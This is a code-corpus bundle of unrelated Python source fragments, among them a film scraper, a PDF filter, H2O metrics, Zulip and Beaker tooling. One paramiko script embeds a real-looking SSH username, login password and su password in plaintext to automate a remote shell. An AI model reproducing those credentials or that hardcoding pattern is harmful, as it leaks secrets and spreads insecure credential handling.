('FILMAFFINITY_REMOVE_FROM_LABEL', ('\(.*?\)', '\[.*?\]', 'cd[0-9]+(-[0-9])?', 'title[0-9]+', 'by .*$'), _('Remove matching of this regexps from item name')),
('FILMAFFINITY_REMOVE_FROM_S
|
EARCHSTRING', ('spanish','xvid','dvdrip','parte','[0-9]*','dvdscreener','mp3'), _('Remove matching of this regexps from search string')),
('FILMAFFINITY_AUTOACCEPT_SINGLE_HIT', True, _('Accept search automatically if it has only one result'))
]
def initmyself(self):
self.isdiscset = False
self.title = ''
self.info = {}
self.image = None # full path image filename
self.image_urls = [] # possible image url list
self.image_url = None # final image url
self.fxdfile = None # filename, full path, WITHOUT extension
self.append = False
self.device = None
self.regexp = None
self.mpl_global_opt = None
self.media_id = None
self.file_opts = []
self.video = []
self.variant = []
self.parts = []
self.var_mplopt = []
self.var_names = []
#image_url_handler stuff
self.image_url_handler = {}
def searchFilmAffinity(self, name):
"""name (string), returns id list
Search for name and returns an id list with tuples:
(id , name, year)"""
# Clean internal variables
self.initmyself()
self.filmaffinity_id_list = []
quoted_name = urllib2.quote(name.strip())
regexp_tag = re.compile('<[^>]+>', re.I)
logger.debug('Request with: %s', quoted_name)
url = 'http://www.filmaffinity.com/es/search.php?stext=%s&stype=title' % quoted_name
req = urllib2.Request(url, txdata, txheaders)
searchstring = name
try:
response = urllib2.urlopen(req)
except urllib2.HTTPError, error:
raise FxdFilmaffinity_Net_Error(_('Connection error: ') + error)
exit
regexp_getmultiple = re.compile('.*<b><a href="(/es/film.*\.html)">(.*?)</a></b>\s*\(([0-9]{4})\)\s*', re.I)
regexp_getsingle = re.compile('^<meta name="keywords" content="movie', re.I)
regexp_geturl = re.compile('.*<a href="/es/.*\.php\?movie_id=([0-9]*)',re.I)
multiple = True
for line in response.read().split("\n"):
#print line
if multiple:
mm = regexp_getmultiple.match(line)
if mm:
#print "Found film in line: %s" % line
link = mm.group(1)
name = mm.group(2)
year = mm.group(3)
self.filmaffinity_id_list += [ (link, name, year) ]
ms = regexp_getsingle.match(line)
if ms: multiple = False
else:
mu = regexp_geturl.match(line)
if mu:
link = "/es/film" + mu.group(1) + ".html"
self.filmaffinity_id_list += [ (link, name, '') ]
break
return self.filmaffinity_id_list
def guessFilmAffinity(self, filename, label=False):
"""Guess possible movies from filename. Same return as searchFilmAffinity"""
name = filename
for r in config.FILMAFFINITY_REMOVE_FROM_LABEL:
name = re.sub(r, '', name.lower())
name = vfs.basename(vfs.splitext(name)[0])
name = re.sub('([a-z])([A-Z])', point_maker, name)
name = re.sub('([a-zA-Z])([0-9])', point_maker, name)
name = re.sub('([0-9])([a-zA-Z])', point_maker, name.lower())
name = re.sub(',', ' ', name)
parts = re.split("[\._' -]", name)
name = ''
for p in parts:
if not p.lower() in config.FILMAFFINITY_REMOVE_FROM_SEARCHSTRING and \
not re.search('[^0-9A-Za-z]', p):
# originally: not re.search(p, '[A-Za-z]'):
# not sure what's meant with that
name += '%s ' % p
return self.searchFilmAffinity(name)
def getFilmAffinityPage(self, url):
"""url
Set an filmaffinity number for object, and fetch data"""
self.myurl = 'http://www.filmaffinity.com/' + urllib2.quote(urllib2.unquote(url))
logger.debug("Now trying to get %s", self.myurl)
req = urllib2.Request(self.myurl, txdata, txheaders)
try:
idpage = urllib2.urlopen(req)
except urllib2.HTTPError, er
|
ajmarks/gymnast
|
gymnast/filters/stream_filter.py
|
Python
|
mit
| 2,087
| 0.003833
|
"""
Abstract base class for stream filters
"""
import six
from collections import namedtuple
from warnings import warn
from ..misc import ensure_str, MetaGettable
base = namedtuple('StreamFilter', ('filter_name','decoder', 'EOD', 'encoder'))
base.__new__.__defaults__ = (None, None)
class StreamFilterBase(base):
"""Stream filter class."""
def decode(self, data, **kwargs):
"""Decode the encoded stream. Keyword arguments are the parameters from
the stream dictionary."""
if self.EOD:
end = data.find(bytes(self.EOD))
return self.decoder(data[:end if end > 0 else None], **kwargs)
else:
return self.decoder(data, **kwargs)
def encode(self, data, **kwargs):
"""Encode the stream data. Keyword arguments are the paramete
|
rs from
the stream dictionary."""
if self.encoder:
return self.encoder(data, **kwargs) + (self.EOD if self.EOD else b'')
else:
warn('Encoding for {} not implemented'.format(self.filter_name))
return data + (self.EOD if self.EOD else b'')
@six.add_metaclass(MetaGettable)
class StreamFilter(object):
"""PDF stream filter stream dispatcher. Stream
|
filters are registered by
calling PdfOperation.register() and passing a subclass of StreamFilterBase.
Information on filters at can be found at
https://partners.adobe.com/public/developer/en/ps/sdk/TN5603.Filters.pdf"""
# Nothing to see here. Pay no attention to that man behind the curtain.
_filters = {}
_nop_filter = StreamFilterBase('NOPFilter', lambda x: x)
@classmethod
def register(cls, filter_name, decoder, eod=None, encoder=None):
"""Register a new stream filter"""
new_filt = StreamFilterBase(filter_name, decoder, eod, encoder)
cls._filters[filter_name] = new_filt
@classmethod
def __getitem__(cls, filter_name):
filter_name = ensure_str(filter_name)
try:
return cls._filters[filter_name]
except KeyError:
return cls._nop_filter
|
sebastian-software/jasy
|
jasy/script/api/Data.py
|
Python
|
mit
| 27,459
| 0.00346
|
#
# Jasy - Web Tooling Framework
# Copyright 2010-2012 Zynga Inc.
# Copyright 2013-2014 Sebastian Werner
#
import jasy.script.api.Text as Text
from jasy.script.util import *
import jasy.core.Console as Console
from jasy import UserError
class ApiData():
"""
Container for all relevant API data.
Automatically generated, filled and cached by jasy.item.Script.getApiDocs().
"""
__slots__ = [
"main", "construct", "statics", "properties", "events", "members",
"id",
"package", "basename",
"errors", "size", "assets", "permutations",
"content", "isEmpty",
"uses", "usedBy",
"includes", "includedBy",
"implements", "implementedBy",
"highlight"
]
def __init__(self, id, highlight=True):
self.id = id
self.highlight = highlight
splits = id.split(".")
self.basename = splits.pop()
self.package = ".".join(splits)
self.isEmpty = False
self.uses = set()
self.main = {
"type" : "Unsupported",
"name" : id,
"line" : 1
}
def addSize(self, size):
"""Adds the statistics on different size aspects."""
self.size = size
def addAssets(self, assets):
"""Adds the info about used assets."""
self.assets = assets
def addUses(self, uses):
self.uses.add(uses)
def removeUses(self, uses):
self.uses.remove(uses)
def addFields(self, permutations):
self.permutations = permutations
def scanTree(self, tree):
self.uses.update(tree.scope.shared)
for package in tree.scope.packages:
splits = package.split(".")
current = splits[0]
for split in splits[1:]:
current = "%s.%s" % (current, split)
self.uses.add(current)
try:
if not self.__processTree(tree):
self.main["errornous"] = True
except UserError as myError:
raise myError
except Exception as error:
self.main["errors"] = ({
"line": 1,
"message": "%s" % error
})
self.main["errornous"] = True
self.warn("Error during processing file: %s" % error, 1)
def __processTree(self, tree):
success = False
callNode = findCall(tree, ("core.Module", "core.Interface", "core.Class", "core.Main.declareNamespace"))
if callNode:
callName = getCallName(callNode)
#
# core.Module
#
|
if callName == "core.Module":
self.setMain(callName, callNode.parent, self.id)
staticsMap = getParameterFromCall(callNode, 1)
if staticsMap:
success = True
self.statics = {}
for staticsEntry in staticsMap:
self.addEntry(staticsEntry[0].value, staticsEntry[1], staticsEntry, self.statics)
else:
self.warn("
|
Invalid core.Module()", callNode.line)
#
# core.Interface
#
elif callName == "core.Interface":
self.setMain(callName, callNode.parent, self.id)
configMap = getParameterFromCall(callNode, 1)
if configMap:
success = True
for propertyInit in configMap:
sectionName = propertyInit[0].value
sectionValue = propertyInit[1]
if sectionName == "properties":
self.properties = {}
for propertyEntry in sectionValue:
self.addProperty(propertyEntry[0].value, propertyEntry[1], propertyEntry, self.properties)
elif sectionName == "events":
self.events = {}
for eventEntry in sectionValue:
self.addEvent(eventEntry[0].value, eventEntry[1], eventEntry, self.events)
elif sectionName == "members":
self.members = {}
for memberEntry in sectionValue:
self.addEntry(memberEntry[0].value, memberEntry[1], memberEntry, self.members)
else:
self.warn('Invalid core.Interface section "%s"' % sectionName, propertyInit.line)
else:
self.warn("Invalid core.Interface()", callNode.line)
#
# core.Class
#
elif callName == "core.Class":
self.setMain(callName, callNode.parent, self.id)
configMap = getParameterFromCall(callNode, 1)
if configMap:
success = True
for propertyInit in configMap:
sectionName = propertyInit[0].value
sectionValue = propertyInit[1]
if sectionName == "construct":
self.addConstructor(sectionValue, propertyInit)
elif sectionName == "properties":
self.properties = {}
for propertyEntry in sectionValue:
self.addProperty(propertyEntry[0].value, propertyEntry[1], propertyEntry, self.properties)
elif sectionName == "events":
self.events = {}
for eventEntry in sectionValue:
self.addEvent(eventEntry[0].value, eventEntry[1], eventEntry, self.events)
elif sectionName == "members":
self.members = {}
for memberEntry in sectionValue:
self.addEntry(memberEntry[0].value, memberEntry[1], memberEntry, self.members)
elif sectionName == "include":
self.includes = [valueToString(entry) for entry in sectionValue]
elif sectionName == "implement":
self.implements = [valueToString(entry) for entry in sectionValue]
elif sectionName == "pooling":
# TODO
pass
else:
self.warn('Invalid core.Class section "%s"' % sectionName, propertyInit.line)
else:
self.warn("Invalid core.Class()", callNode.line)
#
# core.Main.declareNamespace
#
elif callName == "core.Main.declareNamespace":
target = getParameterFromCall(callNode, 0)
assigned = getParameterFromCall(callNode, 1)
if target:
success = True
if assigned and assigned.type == "function":
# Use callNode call for constructor, find first doc comment for main documentation
self.setMain("core.Main", findCommentNode(tree), target.value)
self.addConstructor(assigned, callNode.parent)
else:
self.setMain("core.Main", callNode.parent, target.value)
if assigned and assigned.type == "object_init":
self.statics = {}
for staticsEntry in assigned:
self.addEntry(staticsEntry[0].value, staticsEntry[1], staticsEntry, self.statics)
#
# Handle plain JS namespace -> object assignments
#
else:
def assignMatcher(node):
if node.type == "assign" and node[0].type == "dot":
if node[1].type == "object_init":
doc = getDocComment(node.parent)
if not doc is None:
|
levilucio/SyVOLT
|
UMLRT2Kiltera_MM/MT_post__Par.py
|
Python
|
mit
| 9,121
| 0.017542
|
"""
__MT_post__Par.py_____________________________________________________
Automatically generated AToM3 syntactic object (DO NOT MODIFY DIRECTLY)
Author: gehan
Modified: Sun Feb 15 10:31:27 2015
______________________________________________________________________
"""
from ASGNode import *
from ATOM3Type import *
from ATOM3Text import *
from ATOM3S
|
tring import *
from graph_MT_post__Par import *
class MT_post__Par(ASGNode, ATOM3Type):
def __init__(self, parent = None):
ASGNode.__init__(self)
ATOM3Type.__init__(self)
self.superTypes = ['MT_post__Proc', 'MT_post__MetaModelElement_T']
self.graphClass_ = graph_MT_post__Par
self.isGraphObjectVisual = True
if(hasattr(self, '_setHierarchicalLink')):
|
self._setHierarchicalLink(False)
if(hasattr(self, '_setHierarchicalNode')):
self._setHierarchicalNode(False)
self.parent = parent
self.MT_post__cardinality=ATOM3Text('\n#===============================================================================\n# You can access the value of the current node\'s attribute value by: attr_value.\n# If the current node shall be created you MUST initialize it here!\n# You can access a node labelled n by: PreNode(\'n\').\n# To access attribute x of node n, use: PreNode(\'n\')[\'x\'].\n# Note that the attribute values are those before the match is rewritten.\n# The order in which this code is executed depends on the label value\n# of the encapsulating node.\n# The given action must return the new value of the attribute.\n#===============================================================================\n\nreturn attr_value\n', 80,15 )
self.MT_post__cardinality=ATOM3Text('\n#===============================================================================\n# You can access the value of the current node\'s attribute value by: attr_value.\n# If the current node shall be created you MUST initialize it here!\n# You can access a node labelled n by: PreNode(\'n\').\n# To access attribute x of node n, use: PreNode(\'n\')[\'x\'].\n# Note that the attribute values are those before the match is rewritten.\n# The order in which this code is executed depends on the label value\n# of the encapsulating node.\n# The given action must return the new value of the attribute.\n#===============================================================================\n\nreturn attr_value\n', 80,15 )
self.MT_post__classtype=ATOM3Text('\n#===============================================================================\n# You can access the value of the current node\'s attribute value by: attr_value.\n# If the current node shall be created you MUST initialize it here!\n# You can access a node labelled n by: PreNode(\'n\').\n# To access attribute x of node n, use: PreNode(\'n\')[\'x\'].\n# Note that the attribute values are those before the match is rewritten.\n# The order in which this code is executed depends on the label value\n# of the encapsulating node.\n# The given action must return the new value of the attribute.\n#===============================================================================\n\nreturn attr_value\n', 80,15 )
self.MT_post__classtype=ATOM3Text('\n#===============================================================================\n# You can access the value of the current node\'s attribute value by: attr_value.\n# If the current node shall be created you MUST initialize it here!\n# You can access a node labelled n by: PreNode(\'n\').\n# To access attribute x of node n, use: PreNode(\'n\')[\'x\'].\n# Note that the attribute values are those before the match is rewritten.\n# The order in which this code is executed depends on the label value\n# of the encapsulating node.\n# The given action must return the new value of the attribute.\n#===============================================================================\n\nreturn attr_value\n', 80,15 )
self.MT_post__name=ATOM3Text('\n#===============================================================================\n# You can access the value of the current node\'s attribute value by: attr_value.\n# If the current node shall be created you MUST initialize it here!\n# You can access a node labelled n by: PreNode(\'n\').\n# To access attribute x of node n, use: PreNode(\'n\')[\'x\'].\n# Note that the attribute values are those before the match is rewritten.\n# The order in which this code is executed depends on the label value\n# of the encapsulating node.\n# The given action must return the new value of the attribute.\n#===============================================================================\n\nreturn attr_value\n', 80,15 )
self.MT_post__name=ATOM3Text('\n#===============================================================================\n# You can access the value of the current node\'s attribute value by: attr_value.\n# If the current node shall be created you MUST initialize it here!\n# You can access a node labelled n by: PreNode(\'n\').\n# To access attribute x of node n, use: PreNode(\'n\')[\'x\'].\n# Note that the attribute values are those before the match is rewritten.\n# The order in which this code is executed depends on the label value\n# of the encapsulating node.\n# The given action must return the new value of the attribute.\n#===============================================================================\n\nreturn attr_value\n', 80,15 )
self.MT_label__=ATOM3String('', 20)
self.MT_pivotOut__=ATOM3String('', 20)
self.generatedAttributes = {'MT_post__cardinality': ('ATOM3Text', ),
'MT_post__cardinality': ('ATOM3Text', ),
'MT_post__classtype': ('ATOM3Text', ),
'MT_post__classtype': ('ATOM3Text', ),
'MT_post__name': ('ATOM3Text', ),
'MT_post__name': ('ATOM3Text', ),
'MT_label__': ('ATOM3String', ),
'MT_pivotOut__': ('ATOM3String', ) }
self.realOrder = ['MT_post__cardinality','MT_post__cardinality','MT_post__classtype','MT_post__classtype','MT_post__name','MT_post__name','MT_label__','MT_pivotOut__']
self.directEditing = [0,0,0,0,0,0,1,1]
def clone(self):
cloneObject = MT_post__Par( self.parent )
for atr in self.realOrder:
cloneObject.setAttrValue(atr, self.getAttrValue(atr).clone() )
ASGNode.cloneActions(self, cloneObject)
return cloneObject
def copy(self, other):
ATOM3Type.copy(self, other)
for atr in self.realOrder:
self.setAttrValue(atr, other.getAttrValue(atr) )
ASGNode.copy(self, other)
def preCondition (self, actionID, * params):
if self.graphObject_:
return self.graphObject_.preCondition(actionID, params)
else: return None
def postCondition (self, actionID, * params):
if self.graphObject_:
return self.graphObject_.postCondition(actionID, params)
else: return None
def preAction (self, actionID, * params):
if actionID == self.CREATE:
self.autoIncrLabel(params)
if self.graphObject_:
return self.graphObject_.preAction(actionID, params)
else: return None
def postAction (self, actionID, * params):
if self.graphObject_:
return self.graphObject_.postAction(actionID, params)
else: return None
def QOCA(self, params):
"""
QOCA Constraint Template
NOTE: DO NOT select a POST/PRE action trigger
Constraints will be added/removed in a logical manner by other mechanisms.
"""
return # <---- Remove this to use QOCA
""" Get the high level constraint helper and solver """
from Qoca.atom3constraints.OffsetConstraints import OffsetConstraints
oc = OffsetConstraints(self.parent.qocaSolver)
"""
Example constraint, see Kernel/QOCA/atom3constraints/OffsetConstraints.py
For more types of constraints
"""
oc.fixedWidth(self.graphObject_, self.graphObject_.sizeX)
oc.fixedHeight(self.graphObject_, self.graphObject_.sizeY)
|
AlpineNow/python-alpine-api
|
alpine/alpineobject.py
|
Python
|
mit
| 2,190
| 0.002283
|
from __future__ import unicode_literals
from __future__ import absolute_import
import json
import logging
import logging.config
import os
class AlpineObject(object):
"""
Base Class of Alpine API objects
"""
#
# alpine alpine version string
#
_alpine_api_version = "v1"
_min_alpine_version = "6.2"
def __init__(self, base_url=None, session=None, token=None):
self.base_url = base_url
self.session = session
self.token = token
self._setup_logging()
# Get loggers from the configuration files(logging.json) if exists
# For detail, reference logging.json
self.logger = logging.getLogger("debug") # debug
def _add_token_to_url(self, url):
"""
Used internally to properly form URLs.
:param str url: An Alpine API URL
:return: Formatted URL
:rtype str:
"""
return str("{0}?session_id={1}".format(url, self.token))
@staticmethod
def _setup_logging(default_configuration_set
|
ting_file='l
|
ogging.json',
default_level=logging.INFO,
env_key='LOG_CFG'):
"""
Sets internal values for logging through a file or an environmental variable
:param str default_configuration_setting_file: Path to logging config file. Will be overwritten by
environment variable if it exists.
:param default_level: See possible levels here: https://docs.python.org/2/library/logging.html#logging-levels
:param str env_key: Name of environment variable with logging setting.
:return: None
"""
path = default_configuration_setting_file
value = os.getenv(env_key, None)
if value:
path = value
else:
pass
if os.path.exists(path):
with open(path, 'rt') as f:
config = json.load(f)
logging.config.dictConfig(config)
else:
logging.basicConfig(level=default_level,
format="%(asctime)s %(name)s %(module)s[%(lineno)d] %(levelname)s: %(message)s")
|
Raukonim/piva
|
prac7_2.py
|
Python
|
gpl-3.0
| 897
| 0.069119
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 22 09:37:42 2015
@author: raukonim
"""
from pylab import *
from scipy.misc import lena
from skimage.
|
data import camera
close("all")
interactive(True)
imfourier=fftshift(fft2(lena()))
dimen=imfourier.shape
x,y=meshgrid(linspace(-1,1,dimen[0]), linspace(-1,1,dimen[1]))
filt=sqrt(x*x+y*y)
passhigh=filt>0.6
passlow=filt<0.15
passband=(passhigh+passlow)==0
result=zeros([dimen[0],dimen[1],3], "complex")
result[:,:,0]=passlow*imfourier
result[:,:,1]=passband*imfourier
result[:,:,
|
2]=passhigh*imfourier
iresult=zeros([dimen[0],dimen[1],3], "complex")
iresult[:,:,0]=ifft2(result[:,:,0])
iresult[:,:,1]=ifft2(result[:,:,1])
iresult[:,:,2]=ifft2(result[:,:,2])
filtrada=abs(iresult)
filtrada[:,:,0]/=filtrada[:,:,0].max()
filtrada[:,:,1]/=filtrada[:,:,1].max()
filtrada[:,:,2]/=filtrada[:,:,2].max()
"""
figure()
imshow(, cmap='gray')
"""
|
mahim97/zulip
|
zerver/management/commands/realm_emoji.py
|
Python
|
apache-2.0
| 2,486
| 0.001207
|
import sys
from argparse import ArgumentParser, RawTextHelpFormatter
from typing import Any
from django.core.management.base import CommandParser
from zerver.lib.actions import check_add_realm_emoji, do_remove_realm_emoji
from zerver.lib.management import ZulipBaseCommand
class Command(ZulipBaseCommand):
help = """Manage emoji for the specified realm
Example: ./manage.py realm_emoji --realm=zulip.com --op=add robotheart \\
https://humbug-user-avatars.s3.amazonaws.com/95ffa70fe0e7aea3c052ba91b38a28d8779f5705
Example: ./manage.py realm_emoji --realm=zulip.com --op=remove robotheart
Example: ./manage.py realm_emoji --realm=zulip.com --op=show
"""
# Fix support for multi-line usage
def create_parser(self, *args: Any, **kwargs: Any) -> CommandParser:
parser = super().create_parser(*args, **kwargs)
parser.formatter_class = RawTextHelpFormatter
return parser
def add_arguments(self, parser: ArgumentParser) -> None:
parser.add_argument('--op',
dest='op',
type=str,
default="show",
help='What operation to do (add, show, remove).')
pa
|
rser.add_argument('name', metavar='<name>', type=str, nargs='?', default=None,
help="name of the emoji")
parser.add_argument('img_url', metavar='<image url>', type=str, nargs='?',
help="URL of image to display for the emoji")
self.add_realm_args(parser, True)
def handle(self, *args: Any, **options: str) -> None:
realm = self.get_realm(opti
|
ons)
assert realm is not None # Should be ensured by parser
if options["op"] == "show":
for name, url in realm.get_emoji().items():
print(name, url)
sys.exit(0)
name = options['name']
if name is None:
self.print_help("./manage.py", "realm_emoji")
sys.exit(1)
if options["op"] == "add":
img_url = options['img_url']
if img_url is None:
self.print_help("./manage.py", "realm_emoji")
sys.exit(1)
check_add_realm_emoji(realm, name, img_url)
sys.exit(0)
elif options["op"] == "remove":
do_remove_realm_emoji(realm, name)
sys.exit(0)
else:
self.print_help("./manage.py", "realm_emoji")
sys.exit(1)
|
beaker-project/beaker
|
Misc/rpmlint-config.py
|
Python
|
gpl-2.0
| 3,395
| 0.004418
|
from Config import addFilter
# It's true, our server-side man pages are deficient
addFilter(r'(beaker-server|beaker-lab-cont
|
roller)\.noarch: W: no-manual-page-for-binary')
# Kid templates produce a .pyc without a corresponding .py when they are compiled
addFilter(r'python-bytecode-without-source /usr/lib/python.*/site-packages/bkr/server/templates/.*\.pyc')
# We ship the same logrotate config file for both server and lab-controller,
# so it's just called "beaker"
addFilter(r'incoherent-logrotate-file /etc/logrotate\.d/beaker')
# These are intentionally non-world-readable
addFilter(r'non-readable /etc/bea
|
ker/server\.cfg')
addFilter(r'non-readable /etc/sudoers\.d/beaker_proxy_clear_netboot')
# These are intentionally non-executable, they are executed on test systems instead
addFilter(r'non-executable-script /usr/share/bkr/lab-controller/(anamon|anamon\.init|anamon\.service)')
# This is intentionally not-executable, they are executed on test systems instead
addFilter(r'non-executable-script /usr/lib/python.*/site-packages/bkr/labcontroller/pxemenu-templates/ipxe-menu')
# This is just an rpmlint bug really - This should be executed by iPXE
addFilter(r'wrong-script-interpreter /usr/lib/python.*/site-packages/bkr/labcontroller/pxemenu-templates/ipxe-menu')
# On RHEL6 bash completions are indeed stored in /etc even though they are not
# config. Newer bash-completion moved this to /usr/lib and the problem goes
# away. So delete this when we're not targetting RHEL6 anymore.
addFilter(r'non-conffile-in-etc /etc/bash_completion\.d/bkr')
# RHEL6-only pid file stuff. Under systemd we should be neither owning, nor
# creating, nor using any of this stuff in /var/run.
addFilter(r'dir-or-file-in-var-run /var/run/(beaker|beaker-lab-controller)')
# This cron job is both executable and configuration intentionally,
# this might be violating some packaging guidelines... need to check.
addFilter(r'executable-marked-as-config-file /etc/cron\.hourly/beaker_expire_distros')
# Fake compose data uses empty hidden files to produce the directory structure
addFilter(r'(zero-length|hidden-file-or-dir) /usr/lib/python.*/site-packages/bkr/inttest/labcontroller/compose_layout/')
# Fake client config included with tests
addFilter(r'hidden-file-or-dir /usr/lib/python.*/site-packages/bkr/inttest/client/.beaker_client')
# We are guilty of using jargon from time to time
addFilter(r'spelling-error.* (netboot|distro|distros)')
# We know what we're doing
addFilter(r'dangerous-command-in-%post rm')
addFilter(r'dangerous-command-in-%preun rm')
# No %doc is okay for these as they depend on other subpackages
addFilter(r'(beaker-lab-controller-addDistro|beaker-integration-tests)\.noarch: W: no-documentation')
# RPMs built from git have no %changelog, the proper ones maintained from dist-git do though
addFilter(r'no-changelogname-tag')
# /dev/null always exists
addFilter(r'dangling-symlink .* /dev/null')
# Our initscripts are okay, rpmlint just can't understand the variable substitution
addFilter(r'incoherent-subsys .* \$prog')
# rpmlint is being a bit preachy (we really don't need or want reload)
addFilter(r'no-reload-entry /etc/init\.d/beakerd')
# We can call our services whatever we want
addFilter(r'incoherent-init-script-name beakerd')
# This is just an rpmlint bug really
addFilter(r'explicit-lib-dependency (libxml2-python|libxslt-python|python-passlib)')
|
eldie1984/Scripts
|
pg/pruebas/prueba_ses.py
|
Python
|
gpl-2.0
| 1,904
| 0.028361
|
import paramiko
ses_dict={}
sesiones=[]
upr=[]
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('yvasa850', username='e449806', password='Ema84nue')
chan = ssh.invoke_shell()
# Ssh and wait for the password prompt.
chan.send('su - mwpsyz01 \n')
buff = ''
#i=0
|
while not 'Password:' in buff:
resp = chan.recv(9999)
buff += resp
# i = i + 1
# print "%s: %s" %(i,resp)
# if i==20 or resp.endswith('Password:'):
# ssh.close()
# exit()
# Send the password and wait for a prompt.
chan.send('Sam0la\'P\n')
buff = ''
i=0
while not 'mwpsyz01 >' in buf
|
f:
resp = chan.recv(9999)
buff += resp
# i = i + 1
# print "%s: %s" %(i,resp)
# if i==20 or resp.endswith('mwpsyz01 >'):
# ssh.close()
# exit()
#
## Execute whatever command and wait for a prompt again.
chan.send('uxlst ses ses=\* | grep -v "Commande" | grep -v "SESSION" | grep -v "\-\-\-" | sed \'/^ *$/d\'|awk \'{print $1"|"$3" "$4" "$5" "$6" "$7" "$8" "$9}\'\n')
buff = ''
while not 'mwpsyz01 >' in buff:
resp = chan.recv(9999)
buff += resp
# Now buff has the data I need.
#print 'buff', buff
for sal in buff.split("\n"):
if sal.find(">") == -1 and sal.find("uxlst") == -1 :
sal_sp=sal.split('|')
ses_dict[sal_sp[0]]=sal_sp[1]
sesiones.append(sal_sp[0])
# print sal_sp
# print "->%s" %sal
#print ses_dict
#ssh.close()
#for key in ses_dict:
# print "Sesion:%s -> Nombre:%s " %(key,ses_dict[key])
for ses in sesiones:
print ' uxshw ses ses=%s | grep upr | awk \'{print $4}\'\n' % ses
chan.send(' uxshw ses ses=%s | grep upr | awk \'{print $4}\'\n' % ses)
buff = ''
while not 'mwpsyz01 >' in buff:
resp = chan.recv(9999)
buff += resp
print buff
for sal in buff.split("\n"):
if sal.find(">") == -1 and sal.find("uxlst") == -1 :
upr.append([ses,sal])
for u in upr:
print u
ssh.close()
|
Antiun/purchase-workflow
|
purchase_discount/__openerp__.py
|
Python
|
agpl-3.0
| 1,604
| 0
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
# Copyright (c) 2014-2015 Serv. Tecnol. Avanzados - Pedro M. Baeza
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distribu
|
ted in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public Li
|
cense
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
"name": "Purchase order lines with discounts",
"author": "Tiny, "
"Acysos S.L., "
"Serv. Tecnol. Avanzados - Pedro M. Baeza, "
"Odoo Community Association (OCA)",
"version": "8.0.1.1",
"contributors": [
'Pedro M. Baeza',
],
"category": "Purchase Management",
"depends": [
"stock",
"purchase",
],
"data": [
"views/purchase_discount_view.xml",
"views/report_purchaseorder.xml",
],
"license": 'AGPL-3',
"installable": True
}
|
h2oai/h2o-3
|
h2o-py/h2o/model/metrics_base.py
|
Python
|
apache-2.0
| 105,732
| 0.00419
|
# -*- encoding: utf-8 -*-
"""
Regression model.
:copyright: (c) 2016 H2O.ai
:license: Apache License Version 2.0 (see LICENSE for details)
"""
from __future__ import absolute_import, division, print_function, unicode_literals
from h2o.model.confusion_matrix import ConfusionMatrix
from h2o.plot import decorate_plot_result, get_matplotlib_pyplot, RAISE_ON_FIGURE_ACCESS
from h2o.utils.compatibility import * # NOQA
from h2o.utils.metaclass import backwards_compatibility, deprecated_fn, h2o_meta, deprecated_params
from h2o.utils.typechecks import assert_is_type, assert_satisfies, is_type, numeric
@backwards_compatibility(
instance_attrs=dict(
giniCoef=lambda self, *args, **kwargs: self.gini(*args, **kwargs)
)
)
class MetricsBase(h2o_meta()):
"""
A parent class to house common metrics available for the various Metrics types.
The methods here are available across different model categories.
"""
def __init__(self, metric_json, on=None, algo=""):
# Yep, it's messed up...
if isinstance(metric_json, MetricsBase): metric_json = metric_json._metric_json
self._metric_json = metric_json
# train and valid and xval are not mutually exclusive -- could have a test. train and
# valid only make sense at model build time.
self._on_train = False
self._on_valid = False
self._on_xval = False
self._algo = algo
if on == "training_metrics":
self._on_train = True
elif on == "validation_metrics":
self._on_valid = True
elif on == "cross_validation_metrics":
self._on_xval = True
elif on is None:
pass
else:
raise ValueError("on expected to be train,valid,or xval. Got: " + str(on))
@classmethod
def make(cls, kvs):
"""Factory method to instantiate a MetricsBase object from the list of key-value pairs."""
return cls(metric_json=dict(kvs))
def __repr__(self):
# FIXME !!! __repr__ should never print anything, but return a string
self.show()
return ""
# TODO: convert to actual fields list
def __getitem__(self, key):
return self._metric_json.get(key)
@staticmethod
def _has(dictionary, key):
return key in dictionary and dictionary[key] is not None
def show(self):
"""Display a short summary of the metrics.
:examples:
>>> from from h2o.estimators.gbm import H2OGradientBoostingEstimator
>>> cars = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/junit/cars_20mpg.csv")
>>> cars["economy_20mpg"] = cars["economy_20mpg"].asfactor()
>>> predictors = ["displacement","power","weight","acceleration","year"]
>>> response = "economy_20mpg"
>>> train, valid = cars.split_frame(ratios = [.8], seed = 1234)
>>> cars_gbm = H2OGradientBoostingEstimator(seed = 1234)
>>> cars_gbm.train(x = predictors,
... y = response,
... training_frame = train,
... validation_frame = valid)
>>> cars_gbm.show()
"""
if self._metric_json==None:
print("WARNING: Model metrics cannot be calculated and metric_json is empty due to the absence of the response column in your dataset.")
return
metric_type = self._metric_json['__meta']['schema_type']
types_w_glm = ['ModelMetricsRegressionGLM', 'ModelMetricsRegressionGLMGeneric', 'ModelMetricsBinomialGLM',
'ModelMetricsBinomialGLMGeneric', 'ModelMetricsHGLMGaussianGaussian',
'ModelMetricsHGLMGaussianGaussianGeneric']
types_w_clustering = ['ModelMetricsClustering']
types_w_mult = ['ModelMetricsMultinomial', 'ModelMetricsMultinomialGeneric']
types_w_ord = ['ModelMetricsOrdinal', 'ModelMetricsOrdinalGeneric']
types_w_bin = ['ModelMetricsBinomial', 'ModelMetricsBinomialGeneric', 'ModelMetricsBinomialGLM', 'ModelMetricsBinomialGLMGeneric']
types_w_r2 = ['ModelMetricsRegressionGLM', 'ModelMetricsRegressionGLMGeneric']
types_w_mean_residual_deviance = ['ModelMetricsRegressionGLM', 'ModelMetricsRegressionGLMGeneric',
'ModelMetricsRegression', 'ModelMetricsRegressionGeneric']
types_w_mean_absolute_error = ['ModelMetric
|
sRegressionGLM', 'ModelMetricsRegressionGLMGeneric',
'ModelMetricsRegression', 'ModelMetricsRegr
|
essionGeneric']
types_w_mean_per_class_error = ['ModelMetricsBinomial', 'ModelMetricsBinomialGeneric',
